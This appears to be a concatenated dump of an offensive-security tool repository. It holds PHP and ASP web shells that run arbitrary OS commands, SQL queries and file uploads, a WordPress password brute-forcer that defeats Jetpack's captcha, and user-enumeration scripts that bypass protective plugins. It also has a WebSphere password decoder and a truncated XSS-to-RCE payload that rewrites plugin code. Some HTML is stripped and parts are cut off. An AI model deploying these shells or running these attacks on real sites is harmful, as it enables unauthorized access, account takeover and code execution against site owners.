-------------------------------------------------------------------------------- 1 | 11 |
12 |
13 | Execute SQL Queries: 14 | 15 |

16 | 17 | 18 | 19 |

20 | 21 | 22 | 23 |

24 | 25 | 26 | 27 |
28 |
29 |
30 |
31 | Execute OS Commands: 32 | 33 |

34 | 35 | 36 | 37 |
38 |
39 |
40 |
41 | Upload File: 42 | 43 |

44 | 45 | "/> 46 | 47 | 48 | 49 |
50 |
51 | SQL Query: ".htmlentities($squery)."

"; 69 | $conn = new mysqli($servername, $dbuname, $dbpass, $dbname); 70 | // Check connection 71 | if ($conn->connect_error) 72 | { 73 | die("Connection failed: " . $conn->connect_error); 74 | } 75 | 76 | $result = $conn->query($squery); 77 | 78 | if ($result->num_rows > 0) 79 | { 80 | $start = 0; 81 | // output data of each row 82 | echo ''; 83 | while($row = $result->fetch_assoc()) 84 | { 85 | if($start==0) 86 | { 87 | $col_names = array_keys($row); 88 | echo ""; 89 | foreach($col_names as $col) 90 | { 91 | echo ""; 92 | } 93 | echo ""; 94 | $start++; 95 | } 96 | //echo "
";
 97 | 					//print_r($row);
 98 | 					//echo "
"; 99 | echo ""; 100 | foreach($row as $val) 101 | { 102 | echo ""; 103 | } 104 | echo ""; 105 | } 106 | echo '
$col
$val
'; 107 | } 108 | else 109 | { 110 | echo "0 results"; 111 | } 112 | $conn->close(); 113 | } 114 | elseif(isset($_POST['cmd']))//For command execution 115 | { 116 | echo "Command: ".htmlentities($_POST['cmd'])."

"; 117 | echo "Output:
"; 118 | echo "
";
119 | 			highlight_string(shell_exec($_POST['cmd']));
120 | 			echo "
"; 121 | } 122 | elseif(isset($_FILES['myfile']) && isset($_POST['tpath'])) 123 | { 124 | $target_path = $_POST['tpath']; 125 | $target_path = $target_path.basename($_FILES['myfile']['name']); 126 | echo "File Upload: "; 127 | if(move_uploaded_file($_FILES['myfile']['tmp_name'], $target_path)) 128 | { 129 | echo "The file ".htmlentities(basename($_FILES['myfile']['name']))." has been uploaded"; 130 | } 131 | else 132 | { 133 | echo "There was an error uploading the file, please try again!"; 134 | } 135 | echo ""; 136 | } 137 | else 138 | { 139 | 140 | } 141 | } 142 | } 143 | ?> 144 | -------------------------------------------------------------------------------- /webshell/shell.asp: -------------------------------------------------------------------------------- 1 | <% 2 | Server.ScriptTimeout = 180 3 | Dim wshell, intReturn, strPResult, objCmd, cmd 4 | if Request.Form("submit") <> "" then 5 | cmd = Request.Form("cmd") 6 | Response.Write("Running command: " & cmd & "
") 7 | wshell = CreateObject("WScript.Shell") 8 | objCmd = wShell.Exec(cmd) 9 | strPResult = objCmd.StdOut.Readall() 10 | response.write("
" & replace(replace(strPResult,"<","<"),vbCrLf,"
") & "
") 11 | wshell = nothing 12 | end if 13 | 14 | %> 15 | 16 | 17 | 18 |
19 | Command:
20 | 21 |

Don't forget that if you want to shell command (not a specific executable) you need to call cmd.exe. It is usually located at C:\Windows\System32\cmd.exe, but to be safe just call %ComSpec%. Also, don't forget to use the /c switch so cmd.exe terminates when your command is done. 22 |

Example command to do a directory listing:
23 | %ComSpec% /c dir 24 |

25 | 26 | 27 | -------------------------------------------------------------------------------- /webshell/shell.php: -------------------------------------------------------------------------------- 1 | 2 | -------------------------------------------------------------------------------- /websphere-xor-password-decode-encode.py: -------------------------------------------------------------------------------- 1 | # Decode and Encode WebSphere XOR Password 2 | # Base code from: https://gist.github.com/metall0id/bb3e9bab2b7caee90cb7 3 | 4 | try: 5 | import base64 6 | import argparse 7 | import sys 8 | except: 9 | print "Require following Python packages:\n base64, argparse, sys\n" 10 | print "How to install:\npip install \neasy_install \n" 11 | sys.exit(0) 12 | 13 | parser = argparse.ArgumentParser(description="WebSpere XOR Password Decoder/Encoder") 14 | parser.add_argument('-e', '--encode', help='Encode password', action='store_true') 15 | parser.add_argument('-d', '--decode', help='Decode password', action='store_true') 16 | parser.add_argument('password', help='Password to decode/encode') 17 | args = parser.parse_args() 18 | 19 | return_data = "" 20 | 21 | if args.password: 22 | print "" 23 | if args.encode: 24 | try: 25 | for character in args.password: 26 | return_data += chr(ord(character) ^ ord('_')) 27 | return_data = base64.b64encode(return_data) 28 | print "Decoded Password: " + args.password 29 | print "Encoded Password: {xor}" + return_data 30 | except Exception as e: 31 | print "Exception: " + str(e) 32 | elif args.decode: 33 | try: 34 | if args.password.startswith('{xor}'): 35 | args.password = args.password.replace('{xor}', '') 36 | for character in base64.b64decode(args.password): 37 | return_data += chr(ord(character) ^ ord('_')) 38 | print "Encoded Password: {xor}" + args.password 39 | print "Decoded Password: " + return_data 40 | except Exception as e: 41 | print "Exception: " + str(e) 42 | else: 43 | parse.print_help() 44 | else: 45 | parser.print_help() 46 | -------------------------------------------------------------------------------- /windows-bins/calc.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/interference-security/scripts-tools-shells/3d67f32e0a7bb0f784a3dd4f64b3fdbab2fe4169/windows-bins/calc.exe -------------------------------------------------------------------------------- /windows-bins/cmd.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/interference-security/scripts-tools-shells/3d67f32e0a7bb0f784a3dd4f64b3fdbab2fe4169/windows-bins/cmd.exe -------------------------------------------------------------------------------- /windows-bins/readme.md: -------------------------------------------------------------------------------- 1 | # Windows Binaries 2 | -------------------------------------------------------------------------------- /wordpress/wp_full_path_disclosure.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/python 2 | 3 | #Python script to perform WordPress FPD check 4 | #Tested on: 5 | #Windows,Linux 6 | #WordPress v4.2.2 7 | 8 | try: 9 | from bs4 import BeautifulSoup 10 | import urllib2 11 | import requests 12 | import argparse 13 | import ssl 14 | except Exception,e: 15 | print "[!] Error: "+str(e) 16 | print "[*] Make sure you have the following Python modules installed:\n\tbs4, urllib2, requests, argparse, ssl, lxml" 17 | exit(0) 18 | 19 | parser = argparse.ArgumentParser(description='Check for WordPress Full Path Disclosure vulnerability') 20 | parser.add_argument('-t','--target', help='WordPress target', required=True) 21 | parser.add_argument('-v','--verbose', help='Show verbose message', action='store_const', const=True) 22 | parser.add_argument('-o','--outfile', help='Save output in file') 23 | args = parser.parse_args() 24 | target = args.target.encode('utf-8') 25 | 26 | if target.endswith("/"): 27 | target = target[:-1] 28 | 29 | if hasattr(ssl, '_create_unverified_context'): 30 | ssl._create_default_https_context = ssl._create_unverified_context 31 | 32 | def checker(base_path, target_paths): 33 | for i in target_paths: 34 | try: 35 | target_url = target+base_path+str(i) 36 | if args.verbose: 37 | print "[-] Trying: "+target_url 38 | r = requests.get(target_url, verify=False) 39 | sc = r.status_code 40 | if sc != 404 and sc != 500 and sc != 403: 41 | html = urllib2.urlopen(target_url) 42 | soup = BeautifulSoup(html.read(), "lxml") 43 | allb = soup.find_all("b") 44 | #print allb[1] 45 | try: 46 | res = (str(allb[1]).replace("","")).replace("","") 47 | print "[*] Found: " + str(target_url) + " : " + str(res) 48 | if args.outfile: 49 | f = open(args.outfile, "a") 50 | f.write("[*] Found: " + str(target_url) + " : " + str(res) + "\n") 51 | f.close() 52 | except Exception,e: 53 | #print str(e) 54 | pass 55 | except Exception,e: 56 | #print "Exception occurred" 57 | print str(e) 58 | 59 | print "[*] Started" 60 | requests.packages.urllib3.disable_warnings() 61 | #wp-includes check 62 | print "[*] Checking in 'wp-includes' directory" 63 | wp_includes_path = "/wp-includes/" 64 | target_paths=["admin-bar.php", "atomlib.php", "author-template.php", "bookmark-template.php", "bookmark.php", "cache.php", "canonical.php", "capabilities.php", "category-template.php", "category.php", "class-IXR.php", "class-feed.php", "class-http.php", "class-json.php", "class-oembed.php", "class-phpass.php", "class-phpmailer.php", "class-pop3.php", "class-simplepie.php", "class-smtp.php", "class-snoopy.php", "class-wp-admin-bar.php", "class-wp-ajax-response.php", "class-wp-customize-control.php", "class-wp-customize-manager.php", "class-wp-customize-panel.php", "class-wp-customize-section.php", "class-wp-customize-setting.php", "class-wp-customize-widgets.php", "class-wp-editor.php", "class-wp-embed.php", "class-wp-error.php", "class-wp-http-ixr-client.php", "class-wp-image-editor-gd.php", "class-wp-image-editor-imagick.php", "class-wp-image-editor.php", "class-wp-theme.php", "class-wp-walker.php", "class-wp-xmlrpc-server.php", "class-wp.php", "class.wp-dependencies.php", "class.wp-scripts.php", "class.wp-styles.php", "comment-template.php", "comment.php", "compat.php", "cron.php", "date.php", "default-constants.php", "default-filters.php", "default-widgets.php", "deprecated.php", "feed-atom-comments.php", "feed-atom.php", "feed-rdf.php", "feed-rss.php", "feed-rss2-comments.php", "feed-rss2.php", "feed.php", "files.txt", "formatting.php", "functions.php", "functions.wp-scripts.php", "functions.wp-styles.php", "general-template.php", "http.php", "kses.php", "l10n.php", "link-template.php", "load.php", "locale.php", "media-template.php", "media.php", "meta.php", "ms-blogs.php", "ms-default-constants.php", "ms-default-filters.php", "ms-deprecated.php", "ms-files.php", "ms-functions.php", "ms-load.php", "ms-settings.php", "nav-menu-template.php", "nav-menu.php", "option.php", "pluggable-deprecated.php", "pluggable.php", "plugin.php", "post-formats.php", "post-template.php", "post-thumbnail-template.php", "post.php", "query.php", "registration-functions.php", "registration.php", "revision.php", "rewrite.php", "rss-functions.php", "rss.php", "script-loader.php", "session.php", "shortcodes.php", "taxonomy.php", "template-loader.php", "template.php", "theme.php", "update.php", "user.php", "vars.php", "version.php", "widgets.php", "wp-db.php", "wp-diff.php"] 65 | checker(wp_includes_path, target_paths) 66 | #wp-admin check 67 | print "[*] Checking in 'wp-admin' directory" 68 | wp_admin_path = "/wp-admin/" 69 | target_paths=["about.php", "admin-ajax.php", "admin-footer.php", "admin-functions.php", "admin-header.php", "admin-post.php", "admin.php", "async-upload.php", "comment.php", "credits.php", "custom-background.php", "custom-header.php", "customize.php", "edit-comments.php", "edit-form-advanced.php", "edit-form-comment.php", "edit-link-form.php", "edit-tag-form.php", "edit-tags.php", "edit.php", "export.php", "freedoms.php", "import.php", "index.php", "install-helper.php", "install.php", "link-add.php", "link-manager.php", "link-parse-opml.php", "link.php", "load-scripts.php", "load-styles.php", "media-new.php", "media-upload.php", "media.php", "menu-header.php", "menu.php", "moderation.php", "ms-admin.php", "ms-delete-site.php", "ms-edit.php", "ms-options.php", "ms-sites.php", "ms-themes.php", "ms-upgrade-network.php", "ms-users.php", "my-sites.php", "nav-menus.php", "network.php", "options-discussion.php", "options-general.php", "options-head.php", "options-media.php", "options-permalink.php", "options-reading.php", "options-writing.php", "options.php", "plugin-editor.php", "plugin-install.php", "plugins.php", "post-new.php", "post.php", "press-this.php", "profile.php", "revision.php", "setup-config.php", "theme-editor.php", "theme-install.php", "themes.php", "tools.php", "update-core.php", "update.php", "upgrade-functions.php", "upgrade.php", "upload.php", "user-edit.php", "user-new.php", "users.php", "widgets.php"] 70 | checker(wp_admin_path, target_paths) 71 | print "[*] Completed" 72 | -------------------------------------------------------------------------------- /wordpress/wp_login_attack_jetpack.py: -------------------------------------------------------------------------------- 1 | try: 2 | import mechanize 3 | #import cookielib 4 | import re 5 | import argparse 6 | import warnings 7 | except Exception,e: 8 | print "[!] Error: "+str(e) 9 | print "[*] Make sure you have the following Python modules installed:\n\tmechanize, re, argparse, warning" 10 | exit(0) 11 | 12 | warnings.filterwarnings("ignore") 13 | 14 | parser = argparse.ArgumentParser(description="WordPress login page attack. Supports 'Jetpack' plugin protection bypass.\n") 15 | parser.add_argument('-t','--target', help='WordPress target', required=True) 16 | parser.add_argument('-u','--user', help='WordPress username to attack', required=True) 17 | parser.add_argument('-p','--plist', help='File containing passwords', required=True) 18 | parser.add_argument('-x','--proxy', help='HTTP/HTTPS proxy setting (ip_address:port)') 19 | parser.add_argument('-v','--verbose', help='Show verbose message', action='store_const', const=True) 20 | args = parser.parse_args() 21 | 22 | target = args.target.encode('utf-8') 23 | wp_username = args.user.encode('utf-8') 24 | pass_file = args.plist.encode('utf-8') 25 | wp_jetpack_protect_num = "" 26 | 27 | if target.endswith("/"): 28 | target = target[:-1] 29 | 30 | target = target+"/wp-login.php" 31 | 32 | f = open(pass_file, "r") 33 | pass_list = f.readlines() 34 | 35 | for wp_password in pass_list: 36 | try: 37 | wp_password = (wp_password.replace("\r", "")).replace("\n", "") 38 | # Browser 39 | br = mechanize.Browser() 40 | 41 | #Set proxy 42 | if args.proxy: 43 | br.set_proxies({"http": args.proxy, "https": args.proxy}) 44 | 45 | # Cookie Jar 46 | #cj = cookielib.LWPCookieJar() 47 | #br.set_cookiejar(cj) 48 | 49 | # Browser options 50 | br.set_handle_equiv(True) 51 | br.set_handle_gzip(True) 52 | br.set_handle_redirect(True) 53 | br.set_handle_referer(True) 54 | br.set_handle_robots(False) 55 | 56 | # User-Agent (this is cheating, ok?) 57 | br.addheaders = [('User-agent', 'Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.1) Gecko/2008071615 Fedora/3.0.1-1.fc9 Firefox/3.0.1')] 58 | 59 | r = br.open(target) 60 | 61 | lines = str(br.response().read()) 62 | 63 | #print "[*] HTML source of the target URL: " + target + "\n" + lines 64 | 65 | if "jetpack_protect_num" in lines: 66 | # lines = '5   +   10   =  ' 67 | searchObj = re.search( '(\d{1,}) \ \; \+ \ \; (\d{1,}) \ \; \= \ \;', lines, re.M|re.I) 68 | if searchObj: 69 | if args.verbose: 70 | print "[+] Jetpack Pattern : ", searchObj.group() 71 | print "\t[-] Jetpack 1st digit : ", searchObj.group(1) 72 | print "\t[-] jetpack 2nd digit : ", searchObj.group(2) 73 | wp_jetpack_protect_num = str(int(searchObj.group(1)) + int(searchObj.group(2))) 74 | else: 75 | if args.verbose: 76 | print "[!] Jetpack pattern not found" 77 | 78 | # Show the available forms 79 | #if args.verbose: 80 | # for f in br.forms(): 81 | # print f 82 | 83 | # Select the first (index zero) form 84 | br.select_form(nr=0) 85 | 86 | br.form['log'] = wp_username 87 | br.form['pwd'] = wp_password 88 | if len(wp_jetpack_protect_num)>=1: 89 | br.form['jetpack_protect_num'] = wp_jetpack_protect_num 90 | if args.verbose: 91 | print "[-] Trying: " + wp_username + " : " + wp_password 92 | br.submit() 93 | #print br.response().read() 94 | if "Log Out" in br.response().read(): 95 | print "[*] Found: " + wp_username + " : " + wp_password 96 | except Exception,e: 97 | print "Exception occurred" + str(e) 98 | -------------------------------------------------------------------------------- /wordpress/wp_login_user_enumeration.py: -------------------------------------------------------------------------------- 1 | #Python script for user enumeration from WordPress login page 2 | #It works even if plugins like "Unified Login Error Messages" is installed 3 | 4 | try: 5 | import requests 6 | import sys 7 | import argparse 8 | import ssl 9 | except Exception,e: 10 | print "[!] Error: "+str(e) 11 | print "[*] Make sure you have the following Python modules installed:\n\trequests, argparse, ssl" 12 | exit(0) 13 | 14 | parser = argparse.ArgumentParser(description="WordPress login page user enumeration. Supports 'Unified Login Error Messages' plugin bypass. Technique Reference:\nT1 = Check for 'value=\"\"'\nT2 = Check for \"document.getElementById('user_pass')\"\n") 15 | parser.add_argument('-t','--target', help='WordPress target', required=True) 16 | parser.add_argument('-u','--users', help='File containing usernames', required=True) 17 | parser.add_argument('-o','--outfile', help='Save output in file') 18 | parser.add_argument('-v','--verbose', help='Show verbose message', action='store_const', const=True) 19 | args = parser.parse_args() 20 | target = args.target.encode('utf-8') 21 | user_file = args.users.encode('utf-8') 22 | 23 | f = open(user_file, "r") 24 | user_list = f.readlines() 25 | 26 | #proxies = {"http": "http://127.0.0.1:8080", "https": "http://127.0.0.1:8080",} 27 | cookies = dict(wordpress_test_cookie='WP Cookie Check') 28 | 29 | if hasattr(ssl, '_create_unverified_context'): 30 | ssl._create_default_https_context = ssl._create_unverified_context 31 | 32 | try: 33 | requests.packages.urllib3.disable_warnings() 34 | except: 35 | pass 36 | 37 | for user in user_list: 38 | try: 39 | user = (user.replace("\r", "")).replace("\n", "") 40 | if args.verbose: 41 | print "[-] Trying: " + user 42 | post_data = {"log":user, "pwd":"AnyInvalidPass", "wp-submit":"Log In", "redirect_to":target+"/wp-admin/", "testcookie":"1"} 43 | #r = requests.post(target+"/wp-login.php", data=post_data, proxies=proxies, cookies=cookies, verify=False) 44 | r = requests.post(target+"/wp-login.php", data=post_data, cookies=cookies, verify=False) 45 | sc = r.text 46 | #print sc 47 | check1 = 'value="'+user+'"' 48 | check2 = "document.getElementById('user_pass')"; 49 | #print check1 50 | #print check2 51 | #print int(sc.find(check1)) 52 | if int(sc.find(check1)) > -1: 53 | print "[T1] Valid user: "+user 54 | if args.outfile: 55 | f = open(args.outfile, "a") 56 | f.write("[T1] Valid user: "+user+"\n") 57 | f.close() 58 | else: 59 | if int(sc.find(check2)) > -1: 60 | print "[T2] Valid user: "+user 61 | if args.outfile: 62 | f = open(args.outfile, "a") 63 | f.write("[T2] Valid user: "+user+"\n") 64 | f.close() 65 | except Exception,e: 66 | print "Exception occurred" 67 | -------------------------------------------------------------------------------- /wordpress/wp_plugin_enum.py: -------------------------------------------------------------------------------- 1 | try: 2 | import requests 3 | import argparse 4 | import ssl 5 | except Exception,e: 6 | print "[!] Error: "+str(e) 7 | print "[*] Make sure you have the following Python modules installed:\n\trequests, argparse, ssl" 8 | exit(0) 9 | 10 | parser = argparse.ArgumentParser(description="WordPress plugin enumeration") 11 | parser.add_argument('-t','--target', help='WordPress target', required=True) 12 | parser.add_argument('-p','--plugins', help='File containing plugin names', required=True) 13 | parser.add_argument('-o','--outfile', help='Save output in file') 14 | parser.add_argument('-v','--verbose', help='Show verbose message', action='store_const', const=True) 15 | args = parser.parse_args() 16 | target = args.target.encode('utf-8') 17 | plugin_file = args.plugins.encode('utf-8') 18 | 19 | if target.endswith("/"): 20 | target = target[:-1] 21 | 22 | if hasattr(ssl, '_create_unverified_context'): 23 | ssl._create_default_https_context = ssl._create_unverified_context 24 | 25 | print "[*] Started" 26 | 27 | try: 28 | requests.packages.urllib3.disable_warnings() 29 | except: 30 | pass 31 | 32 | f = open(plugin_file, "r") 33 | data = f.readlines() 34 | 35 | print "\nNote: Append readme.txt or changelog.txt in same or different letter cases to open version file\n" 36 | 37 | for i in data: 38 | try: 39 | i = (i.replace("\r","")).replace("\n","") 40 | if args.verbose: 41 | print "[-] Trying: " + i 42 | r = requests.get(target+"/wp-content/plugins/"+i+"/", verify=False, allow_redirects=False) 43 | sc = r.status_code 44 | if sc != 404 and sc != 500 and sc != 403 and sc != 301 and sc != 302: 45 | print i + " : " + str(sc) + " : " + target + "/wp-content/plugins/" + i + "/" 46 | if args.outfile: 47 | f = open(args.outfile, "a") 48 | f.write(i + " : " + str(sc) + " : " + target + "/wp-content/plugins/" + i + "/" + "\n") 49 | f.close() 50 | except Exception,e: 51 | print "Exception occurred" 52 | print "[*] Completed" 53 | -------------------------------------------------------------------------------- /wordpress/wp_user_enumeration_with_plugin_bypass.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/python 2 | 3 | #Python script to perform WordPress user enumeration even if "Stop User Enumeration" plug-in is installed 4 | #Tested on: 5 | #Windows,Linux 6 | #WordPress v4.2.2 7 | #Stop User Enumeration v1.3.1 8 | 9 | try: 10 | from bs4 import BeautifulSoup 11 | import urllib2 12 | import requests 13 | import sys 14 | import argparse 15 | import ssl 16 | except Exception,e: 17 | print "[!] Error: "+str(e) 18 | print "[*] Make sure you have the following Python modules installed:\n\tbs4, urllib2, requests, argparse, ssl" 19 | exit(0) 20 | 21 | parser = argparse.ArgumentParser(description="WordPress user enumeration even if 'Stop User Enumeration' plug-in is installed") 22 | parser.add_argument('-t','--target', help='WordPress target', required=True) 23 | parser.add_argument('-s','--start', help='Author start number value', required=True, type=int) 24 | parser.add_argument('-e','--end', help='Author end number value', required=True, type=int) 25 | parser.add_argument('-o','--outfile', help='Save output in file') 26 | parser.add_argument('-v','--verbose', help='Show verbose message', action='store_const', const=True) 27 | args = parser.parse_args() 28 | target = args.target.encode('utf-8') 29 | 30 | if target.endswith("/"): 31 | target = target[:-1] 32 | 33 | if hasattr(ssl, '_create_unverified_context'): 34 | ssl._create_default_https_context = ssl._create_unverified_context 35 | 36 | print "[*] Started" 37 | try: 38 | requests.packages.urllib3.disable_warnings() 39 | except: 40 | pass 41 | for i in range(int(args.start),int(args.end)+1): 42 | try: 43 | target_url = target+"/?author="+str(i) 44 | if args.verbose: 45 | print "[-] Trying: " + target_url 46 | r = requests.get(target_url, verify=False) 47 | sc = r.status_code 48 | if sc==500: 49 | target_url = target+"/?a=b&author%00="+str(i) 50 | if args.verbose: 51 | print "[-] Trying: " + target+"/?a=b&author%00="+str(i) 52 | r = requests.get(target_url, verify=False) 53 | sc = r.status_code 54 | if sc != 404 and sc != 500 and sc != 403: 55 | html = urllib2.urlopen(target_url) 56 | soup = BeautifulSoup(html.read(), "lxml") 57 | tag = soup.body 58 | uname = (tag['class'][2]).replace("author-","") 59 | #print str(i) + " : " + str(sc) 60 | print str(i) + " : " + str(uname) 61 | if args.outfile: 62 | f = open(args.outfile, "a") 63 | f.write(str(i) + " : " + str(uname) + "\n") 64 | f.close() 65 | except Exception,e: 66 | #print "Exception occurred" 67 | print str(e) 68 | print "[*] Completed" 69 | -------------------------------------------------------------------------------- /wordpress/wp_xss2rce.js: -------------------------------------------------------------------------------- 1 | //Source: https://twitter.com/brutelogic 2 | 3 | x=new XMLHttpRequest() 4 | p='/wp-admin/plugin-editor.php?' 5 | f='file=akismet/index.php' 6 | x.open('GET',p+f,0) 7 | x.send() 8 | $='_wpnonce='+/ce" value="([^"]*?)"/.exec(x.responseText)[1]+'&newcontent=